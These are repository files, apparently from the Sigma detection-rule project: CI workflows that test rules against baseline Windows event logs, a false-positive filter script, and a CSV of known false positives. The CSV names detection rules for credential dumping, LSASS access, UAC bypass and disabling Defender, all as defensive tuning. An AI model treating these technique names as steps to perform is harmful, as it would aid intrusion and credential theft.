    "content": "# This workflow will install Python dependencies, run tests and lint with a single version of Python\n# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions\n\nname: Goodlog Tests\n\non: [push, pull_request, merge_group, workflow_dispatch]\n\nenv:\n  EVTX_BASELINE_VERSION: v0.8.4\n\njobs:\n  check-baseline-win7:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 7 32-bit baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win7-x86.tgz\n        tar xzf win7-x86.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod +x evtx-sigma-checker\n        ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path win7_x86/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: |\n        chmod +x .github/workflows/matchgrep.sh\n        ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n\n  check-baseline-win10:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 10 baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win10-client.tgz\n        tar xzf win10-client.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod +x evtx-sigma-checker\n        
./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Logs_Client/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: |\n        chmod +x .github/workflows/matchgrep.sh\n        ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n\n  check-baseline-win11:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 11 baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win11-client.tgz\n        tar xzf win11-client.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod +x evtx-sigma-checker\n        ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Logs_Win11/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: |\n        chmod +x .github/workflows/matchgrep.sh\n        ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n\n  check-baseline-win11-2023:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 11 baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win11-client-2023.tgz\n        tar xzf win11-client-2023.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod 
+x evtx-sigma-checker\n        ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Logs_Win11_2023/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: |\n        chmod +x .github/workflows/matchgrep.sh\n        ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n\n  check-baseline-win2022:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 2022 baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-evtx.tgz\n        tar xzf win2022-evtx.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod +x evtx-sigma-checker\n        ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path win2022-evtx/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n\n  check-baseline-win2022-domain-controller:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 2022 baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-ad.tgz\n        tar xzf win2022-ad.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod +x 
evtx-sigma-checker\n        ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Win2022-AD/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n\n  check-baseline-win2022-0-20348-azure:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 2022.0.20348 Azure baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz\n        tar xzf win2022-0-20348-azure.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod +x evtx-sigma-checker\n        ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: |\n        chmod +x .github/workflows/matchgrep.sh\n        ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n"
  },
  {
    "path": ".github/workflows/greetings.yml",
    "content": "name: Greet First-Time Contributors\n\non:\n  pull_request:\n    types:\n      - opened\n  issues:\n    types:\n      - opened\n\npermissions:\n  issues: write\n  pull-requests: write\n  id-token: write\n  contents: read\n\njobs:\n  greeting:\n    name: Greet First-Time Contributors\n    if: github.event_name == 'issues' || (github.event_name == 'pull_request' && github.event.pull_request.head.repo.full_name != github.repository)\n    runs-on: ubuntu-latest\n\n    steps:\n      - uses: actions/first-interaction@v3\n        with:\n          issue_message: |\n            Welcome :wave:\n\n            It looks like this is your first issue on the Sigma rules repository!\n\n            The following repository accepts issues related to `false positives` or `rule ideas`.\n\n            If you're reporting an issue related to the pySigma library please consider submitting it [here](https://github.com/SigmaHQ/pySigma)\n\n            Thanks for taking the time to open this issue, and welcome to the Sigma community! :smiley:\n\n\n          pr_message: |\n            Welcome :wave:\n            \n            It looks like this is your first pull request on the Sigma rules repository!\n\n            Please make sure to read the [SigmaHQ conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/) to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval.\n\n            Thanks again, and welcome to the Sigma community! :smiley:\n"
  },
  {
    "path": ".github/workflows/known-FPs.csv",
    "content": "RuleId;RuleName;MatchString\n8e5e38e4-5350-4c0b-895a-e872ce0dd54f;Msiexec Initiated Connection;.*\nad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94;Suspicious WSMAN Provider Image Loads;.*\ndb809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;python-3\ndb809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;target\\.exe\n96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;.*\n1277f594-a7d1-4f28-a2d3-73af5cbeab43;Windows Shell File Write to Suspicious Folder;Computer: Agamemnon\ne28a5a99-da44-436d-b7a0-2afc20a5f413;Whoami Execution;WindowsPowerShell\n8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;(sysmon-intense\\.xml|sysmonconfig-trace\\.xml)\n8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: (evtx-PC|Agamemnon)\n4358e5a5-7542-4dcb-b9f3-87667371839b;ISO or Image Mount Indicator in Recent Files;_Office_Professional_Plus_\n36480ae1-a1cb-4eaa-a0d6-29801d7e9142;Renamed Binary;WinRAR\n73bba97f-a82d-42ce-b315-9182e76c57b1;Imports Registry Key From a File;Evernote\n6741916F-B4FA-45A0-8BF8-8249C702033A;Added Rule in Windows Firewall with Advanced Security;\\\\Integration\\\\Integrator\\.exe\n00bb5bd5-1379-4fcf-a965-a5b6f7478064;Setting Change in Windows Firewall with Advanced Security;Level: 4  Task: 0\n162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer(_Service)?\\.exe\ncdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20\\.49\\.150\\.241\nbef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151\\.101\\.64\\.223\nbef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;146\\.75\\.117\\.55\n9711de76-5d4f-4c50-a94f-21e4e8f8384d;Installation of TeamViewer Desktop;TeamViewer_Desktop\\.exe\n9494479d-d994-40bf-a8b1-eea890237021;Scheduled Task Creation From Potential Suspicious Parent Location;.*\n81325ce1-be01-4250-944f-b4789644556f;Suspicius Schtasks From Env Var 
Folder;TVInstallRestore\n6ea3bf32-9680-422d-9f50-e90716b12a66;UAC Bypass Via Wsreset;EventType: DeleteKey\n43f487f0-755f-4c2a-bce7-d6d2eec2fcf8;Suspicious Add Scheduled Task From User AppData Temp;TVInstallRestore\nc187c075-bb3e-4c62-b4fa-beae0ffc211f;Deteled Rule in Windows Firewall with Advanced Security;Dropbox.*\\\\netsh\\.exe\n69aeb277-f15f-4d2d-b32a-55e883609563;Disabling Windows Event Auditing;Computer: .*\nac175779-025a-4f12-98b0-acdaeb77ea85;PowerShell Script Run in AppData;\\\\Evernote-\n1f2b5353-573f-4880-8e33-7d04dcf97744;Sysmon Configuration Modification;Computer: evtx-PC\n734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);WIN-FPV0DSIC9O6\n734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);Computer: Agamemnon\na96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;Ninite\\.exe\n349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;Ninite\\.exe\na96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\\.exe\n349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;target\\.exe\na96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\\.exe\n349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\\.exe\n7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\\.exe\n949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: Agamemnon\n949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: WinDev2310Eval\nfdbf0b9d-0182-4c43-893b-a1eaab92d085;Newly Registered Protocol Handler;.*\n100ef69e-3327-481c-8e5c-6d80d9507556;System Eventlog Cleared;.*\n52a85084-6989-40c3-8f32-091e12e17692;Suspicious Usage of CVE_2021_34484 or CVE 2022_21919;Computer: Agamemnon\n573df571-a223-43bc-846e-3f98da481eca;Copy a File Downloaded From Internet;7z\\.exe\n37774c23-25a1-4adb-bb6d-8bb9fd59c0f8;Image Load of VSS Dll by Uncommon 
Executable;SetupFrontEnd\\.exe\n1a31b18a-f00c-4061-9900-f735b96c99fc;Remote Access Tool Services Have Been Installed - System;ServiceName: TeamViewer\nc8b00925-926c-47e3-beea-298fd563728e;Remote Access Tool Services Have Been Installed - Security;ServiceName: TeamViewer\nb69888d4-380c-45ce-9cf9-d9ce46e67821;Executable in ADS;msedge\\.exe \nb69888d4-380c-45ce-9cf9-d9ce46e67821;Executable in ADS;firefox\\.exe \nb69888d4-380c-45ce-9cf9-d9ce46e67821;Executable in ADS;7z\\.exe\n65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;powershell\\.exe\n65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;Computer: WIN-FPV0DSIC9O6.sigma.fr\na62b37e0-45d3-48d9-a517-90c1a1b0186b;Eventlog Cleared;Computer: .*\n4eec988f-7bf0-49f1-8675-1e6a510b3a2a;Potential PendingFileRenameOperations Tamper;target\\.exe\n4eec988f-7bf0-49f1-8675-1e6a510b3a2a;Potential PendingFileRenameOperations Tamper;target\\.tmp\n48bfd177-7cf2-412b-ad77-baf923489e82;Image Load of VSS Dll by Uncommon Executable;SetupFrontEnd.exe\n87911521-7098-470b-a459-9a57fc80bdfd;Sysmon Configuration Updated;.*\n0eb46774-f1ab-4a74-8238-1155855f2263;Disable Windows Defender Functionalities Via Registry Keys;.*\ne9d4ab66-a532-4ef7-a502-66a9e4a34f5d;NTLMv1 Logon Between Client and Server;.*\nccb5742c-c248-4982-8c5c-5571b9275ad3;Potential Suspicious Findstr.EXE Execution;httpd\\.exe\n9ae01559-cf7e-4f8e-8e14-4c290a1b4784;CredUI.DLL Load By Uncommon Process;Spotify\\.exe\n52182dfb-afb7-41db-b4bc-5336cb29b464;Suspicious File Download From File Sharing Websites;objects\\.githubusercontent\\.com\nce72ef99-22f1-43d4-8695-419dcb5d9330;Suspicious Windows Service Tampering;TeamViewer\ndae8171c-5ec6-4396-b210-8466585b53e9;SCM Database Privileged Operation;0x277c6\n3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781;OpenSSH Server Listening On Socket;.*\nb69888d4-380c-45ce-9cf9-d9ce46e67821;Hidden Executable In NTFS Alternate Data Stream;.*\n4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76;Potentially Suspicious AccessMask 
Requested From LSASS;\\\\setup\\.exe\nd99b79d2-0a6f-4f46-ad8b-260b6e17f982;Security Eventlog Cleared;Computer: WinDevEval\nb28e58e4-2a72-4fae-bdee-0fbe904db642;Windows Defender Real-time Protection Disabled;Computer: WinDev2310Eval\nef9dcfed-690c-4c5d-a9d1-482cd422225c;Browser Execution In Headless Mode;.*\n65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;Computer: (DESKTOP-6D0DBMB|WinDev2310Eval)\nde587dce-915e-4218-aac4-835ca6af6f70;Potential Persistence Attempt Via Run Keys Using Reg.EXE;\\\\Discord\\\\\n24357373-078f-44ed-9ac4-6d334a668a11;Direct Autorun Keys Modification;Discord\\.exe\n8fbf3271-1ef6-4e94-8210-03c2317947f6;Cred Dump Tools Dropped Files;Svchost\\.exe\nc7da8edc-49ae-45a2-9e61-9fd860e4e73d;PUA - Sysinternals Tools Execution - Registry;.*\ndcff7e85-d01f-4eb5-badd-84e2e6be8294;Windows Default Domain GPO Modification via GPME;Computer: WIN-FPV0DSIC9O6.sigma.fr\n416bc4a2-7217-4519-8dc7-c3271817f1d5;Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location;procexp64\\.exe\n5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d;Cmd Launched with Hidden Start Flags to Suspicious Targets;xampp\n558eebe5-f2ba-4104-b339-36f7902bcc1a;File Creation Date Changed to Another Year;(\\\\target\\.exe|thm\\.wxl|\\\\AppData\\\\Local\\\\Temp\\\\)\n5e993621-67d4-488a-b9ae-b420d08b96cb;Service Installation in Suspicious Folder;\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\MBAMInstallerService\\.exe\n"
  },
  {
    "path": ".github/workflows/matchgrep.sh",
    "content": "#!/bin/bash\n\ninfile=$1\nfps=$2\n\nif [[ -z ${infile} || -z ${fps} ]]; then\n    >&2 echo \"usage: $0 [json-file] [FPs.csv]\" \n    exit 1\nfi\n\nif [[ ! -f ${infile}  || ! -r ${infile} ]]; then\n    >&2 echo \"${infile} is not a valid, readable file\"\n    exit 2\nfi\nif [[ ! -f ${fps}  || ! -r ${fps} ]]; then\n    >&2 echo \"${fps} is not a valid, readable file\"\n    exit 2\nfi\n\n# Exclude all rules with level \"low\"\nfindings=$(grep -v '\"RuleLevel\":\"low\"' \"${infile}\")\n\n{\n    read -r # Skip CSV header\n    while IFS=\\; read -r id _name fpstring; do\n        findings=$(echo \"${findings}\" | grep -iEv \"\\\"RuleId\\\":\\\"${id}\\\".*${fpstring}\")\n    done\n} < \"${fps}\"\n\nif [[ -z ${findings} ]]; then\n    echo \"No matches found.\"\nelse\n    >&2 echo \"Found matches:\"\n    echo \"${findings}\"\n    >&2 echo\n    >&2 echo \"Match overview:\"\n    echo \"${findings}\" | jq -c '. | {RuleId, RuleTitle, RuleLevel}' | sort | uniq -c | sort -nr >&2\n    >&2 echo\n    >&2 echo \"You either need to tune your rule(s) for false positives or add a false positive filter to .github/workflows/known-FPs.csv\"\n    exit 3\nfi\n"
  },
  {
    "path": ".github/workflows/pr-labeler.yml",
    "content": "on:\n  pull_request_target:\n    types:\n      - opened\n\nname: PR Labeler Workflow\n\njobs:\n  triage:\n    permissions:\n      contents: read\n      pull-requests: write\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/labeler@v6\n"
  },
  {
    "path": ".github/workflows/ref-archiver.yml",
    "content": "name: \"Reference Archiver\"\n\non:\n  #push:\n  #  branches:\n  #      - \"*\"\n  schedule:\n    - cron: \"30 1 1,15 * *\" # At 01:30 on day-of-month 1 and 15.\n  \n  # Allows you to run this workflow manually from the Actions tab\n  workflow_dispatch:\n\njobs:\n  archive:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n      with:\n        submodules: true\n    - name: Set up Python 3.11\n      uses: actions/setup-python@v6\n      with:\n        python-version: 3.11\n    - name: Execute Reference Archiver\n      run: |\n        pip install PyYAML argparse requests\n        python tests/reference-archiver.py\n    - name: Create Pull Request\n      uses: peter-evans/create-pull-request@v5\n      with:\n        reviewers: nasbench, frack113, phantinuss\n        delete-branch: true\n        branch: 'create-pull-request/reference-archiver'\n        commit-message: 'chore: archive new rule references and update cache file'\n        title: 'Archive New Rule References'\n        body: |\n          ### Summary of the Pull Request\n\n          This PR updates the cache file used to record already archived references with the newly archived results.\n\n          ### Changelog\n\n          chore: archive new rule references and update cache file\n\n          ### Example Log Event\n\n          N/A\n\n          ### Fixed Issues\n\n          N/A\n\n          ### SigmaHQ Rule Creation Conventions\n          \n          - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/sigmahq_conventions.md)\n"
  },
  {
    "path": ".github/workflows/regression-tests.yml",
    "content": "name: Regression Tests\n\non: [push, pull_request, workflow_dispatch]\n\nenv:\n  EVTX_BASELINE_VERSION: v0.8.4\n\njobs:\n  true-positive-tests:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n\n    - name: Set up Python\n      uses: actions/setup-python@v6\n      with:\n        python-version: '3.11'\n\n    - name: Install Python dependencies\n      run: |\n        python -m pip install --upgrade pip\n        pip install pyyaml\n\n    - name: Download evtx-sigma-checker\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n        chmod +x evtx-sigma-checker\n\n    - name: Run regression tests\n      run: |\n        python tests/regression_tests_runner.py --rules-paths rules rules-emerging-threats rules-threat-hunting --evtx-checker ./evtx-sigma-checker --thor-config tests/thor.yml --ignore-validation\n"
  },
  {
    "path": ".github/workflows/release.yml",
    "content": "on:\n  push:\n    tags:\n      - 'r*'\n\nname: Create Release\n\njobs:\n  build:\n    name: Create Release\n    runs-on: ubuntu-latest\n    steps:\n      - name: Checkout code\n        uses: actions/checkout@v5\n        with:\n          fetch-depth: 0\n      - name: Generate Changelog\n        run: |\n          prev_tag=$(git for-each-ref --sort=creatordate --format '%(refname:lstrip=2)' refs/tags | grep ^r | tail -2 | head -1)\n          curr_tag=$(git for-each-ref --sort=creatordate --format '%(refname:lstrip=2)' refs/tags | grep ^r | tail -1)\n          echo \"Previous tag: ${prev_tag}\"\n          echo \"Current tag: ${curr_tag}\"\n          if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*new: ' -c) -gt 0 ]]; then echo \"### New Rules\" > changes.txt; fi\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*new: ' | sort -u | sed -e 's%^% - %' >> changes.txt\n          if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*update: ' -c) -gt 0 ]]; then echo \"### Updated Rules\" >> changes.txt; fi\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*update: ' | sort -u | sed -e 's%^% - %' >> changes.txt\n          if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*remove: ' -c) -gt 0 ]]; then echo \"### Removed / Deprecated Rules\" >> changes.txt; fi\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*remove: ' | sort -u | sed -e 's%^% - %' >> changes.txt\n          if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*fix: ' -c) -gt 0 ]]; then echo \"### Fixed Rules\" >> changes.txt; fi\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*fix: ' | sort -u | sed -e 's%^% - %' >> changes.txt\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -ioP 'Merge PR #\\d+ from \\K(@\\S+)' | sort -u > authors_raw.txt\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -oP \"Co-authored-by: 
\\K.*(?= <)\" | sort -u | sed -e 's%^%@%' >> authors_raw.txt\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -ioP \"Thanks: \\K.*?(?=$| for)\" | sort -u >> authors_raw.txt\n          LC_ALL=en_US.UTF-8 sort -u authors_raw.txt | grep -v 'dependabot\\[bot\\]' > authors.txt\n          cat changes.txt >> changelog.txt\n          echo \"\" >> changelog.txt\n          echo \"### Acknowledgement\" >> changelog.txt\n          echo \"Thanks to $(perl -pe 's%\\n%, %' authors.txt | sed 's%, $%%') for their contribution to this release\" >> changelog.txt\n          echo \"\" >> changelog.txt\n          echo \"\" >> changelog.txt\n          echo \"### Which Sigma rule package should I use?\" >> changelog.txt\n          echo \"A detailed explanation can be found in the [Releases.md](Releases.md) file. If you are new to Sigma, we recommend starting with the \\\"Core\\\" ruleset.\" >> changelog.txt\n          echo \"\" >> changelog.txt\n          echo \"The [latest release package on GitHub](https://docs.github.com/en/repositories/releasing-projects-on-github/linking-to-releases#linking-to-the-latest-release) can always be found [here](https://github.com/SigmaHQ/sigma/releases/latest).\" >> changelog.txt\n          cat changelog.txt\n      - name: Build all release packages\n        run: |\n          python3 tests/sigma-package-release.py --min-status test --min-level high --rule-types generic --outfile sigma_core.zip\n          python3 tests/sigma-package-release.py --min-status test --min-level medium --rule-types generic --outfile sigma_core+.zip\n          python3 tests/sigma-package-release.py --min-status experimental --min-level medium --rule-types generic --outfile sigma_core++.zip\n          python3 tests/sigma-package-release.py --min-status experimental --min-level medium --rule-types et --outfile sigma_emerging_threats_addon.zip\n          python3 tests/sigma-package-release.py --min-status experimental --min-level medium --rule-types generic et 
--outfile sigma_all_rules.zip\n      - name: Create Release with Assets\n        id: create_release\n        uses: softprops/action-gh-release@v2\n        with:\n          tag_name: ${{ github.ref }}\n          name: Release ${{ github.ref_name }}\n          body_path: changelog.txt\n          token: ${{ secrets.GITHUB_TOKEN }}\n          draft: true\n          prerelease: false\n          files: |\n            sigma_core.zip\n            sigma_core+.zip\n            sigma_core++.zip\n            sigma_emerging_threats_addon.zip\n            sigma_all_rules.zip\n"
  },
  {
    "path": ".github/workflows/sigma-rule-deprecated.yml",
    "content": "name: \"Create deprecated summary\"\n\non:\n  #push:\n  #  branches:\n  #      - \"*\"\n  schedule:\n    - cron: \"0 0 1 * *\" # At 00:00 on day-of-month 1.\n\n  # Allows you to run this workflow manually from the Actions tab\n  workflow_dispatch:\n\njobs:\n  pull-master:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n      with:\n        submodules: true\n    - name: Set up Python 3.11\n      uses: actions/setup-python@v6\n      with:\n        python-version: 3.11\n    - name: Execute deprecated rules script\n      run: |\n        pip install pySigma\n        python tests/deprecated_rules.py --format csv\n        python tests/deprecated_rules.py --format json\n    - name: Create Pull Request\n      uses: peter-evans/create-pull-request@v7\n      with:\n        reviewers: nasbench, frack113, phantinuss\n        delete-branch: true\n        commit-message: 'chore: update deprecated csv'\n        branch: 'create-pull-request/rule-deprecated'\n        title: 'Update deprecated.csv'\n        body: |\n          ### Summary of the Pull Request\n\n          This PR updates the deprecated summary file `deprecated.csv` and `deprecated.json`\n\n          ### Changelog\n\n          chore: update deprecated.csv and deprecated.json\n\n          ### Example Log Event\n\n          N/A\n\n          ### Fixed Issues\n\n          N/A\n\n          ### SigmaHQ Rule Creation Conventions\n\n          - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/tree/main/sigmahq)\n"
  },
  {
    "path": ".github/workflows/sigma-rule-promoter.yml",
    "content": "#name: \"Promote Experimental Rules To Test\"\n#\n#on:\n#  #push:\n#  #  branches:\n#  #      - \"*\"\n#  schedule:\n#    - cron: \"0 0 1 * *\" # At 00:00 on day-of-month 1.\n#  \n#  # Allows you to run this workflow manually from the Actions tab\n#  workflow_dispatch:\n#\n#jobs:\n#  pull-master:\n#    runs-on: ubuntu-latest\n#    steps:\n#    - uses: actions/checkout@v5\n#      with:\n#        submodules: true\n#    - name: Set up Python 3.11\n#      uses: actions/setup-python@v6\n#      with:\n#        python-version: 3.11\n#    - name: Execute Rule Promoter Script\n#      run: |\n#        pip install pySigma\n#        python tests/promote_rules_status.py\n#    - name: Create Pull Request\n#      uses: peter-evans/create-pull-request@v7\n#      with:\n#        reviewers: nasbench, frack113, phantinuss\n#        delete-branch: true\n#        commit-message: 'chore: promote older rules status from `experimental` to `test`'\n#        branch: 'create-pull-request/rule-promotion'\n#        title: 'Promote Older Rules From `experimental` to `test`'\n#        body: |\n#          ### Summary of the Pull Request\n#\n#          This PR promotes the status of rules that haven't been changed for over 300 days from `experimental` to `test`.\n#\n#          ### Changelog\n#\n#          chore: promote older rules status from `experimental` to `test`\n#\n#          ### Example Log Event\n#\n#          N/A\n#\n#          ### Fixed Issues\n#\n#          N/A\n#\n#          ### SigmaHQ Rule Creation Conventions\n#          \n#          - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/sigmahq_conventions.md)\n#\n"
  },
  {
    "path": ".github/workflows/sigma-test.yml",
    "content": "# This workflow will install Python dependencies, run tests and lint with a single version of Python\n# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions\n\nname: Sigma Rule Tests\n\non: [push, pull_request, merge_group, workflow_dispatch]\n\njobs:\n  yamllint:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: yaml-lint\n      uses: ibiqlik/action-yamllint@v3\n      with:\n        strict: true # fail on warnings as well\n\n  test-sigma-logsource:\n    runs-on: ubuntu-latest\n    needs: yamllint\n    steps:\n    - uses: actions/checkout@v5\n      with:\n        submodules: true\n    - name: Set up Python 3.11\n      uses: actions/setup-python@v6\n      with:\n        python-version: 3.11\n    - name: Test Sigma logsource\n      run: |\n        pip install PyYAML colorama\n        python tests/test_logsource.py\n\n  test-sigma-legacy:\n    runs-on: ubuntu-latest\n    needs: yamllint\n    steps:\n    - uses: actions/checkout@v5\n      with:\n        submodules: true\n    - name: Set up Python 3.11\n      uses: actions/setup-python@v6\n      with:\n        python-version: 3.11\n    - name: Test Sigma Rules\n      run: |\n        pip install PyYAML colorama\n        python tests/test_rules.py\n\n  sigma-check:\n    runs-on: ubuntu-latest\n    needs: yamllint\n    steps:\n    - uses: actions/checkout@v5\n      with:\n        submodules: true\n    - name: Set up Python 3.11\n      uses: actions/setup-python@v6\n      with:\n        python-version: 3.11\n    - name: Install dependencies\n      run: |\n        pip install pysigma\n        pip install sigma-cli\n        pip install pySigma-validators-sigmahq==0.20.*\n    - name: Test Sigma Rule Syntax\n      run: |\n        sigma check --fail-on-error --fail-on-issues --validation-config tests/sigma_cli_conf.yml rules*\n\n  duplicate-id-check:\n    runs-on: ubuntu-latest\n    needs: yamllint\n    
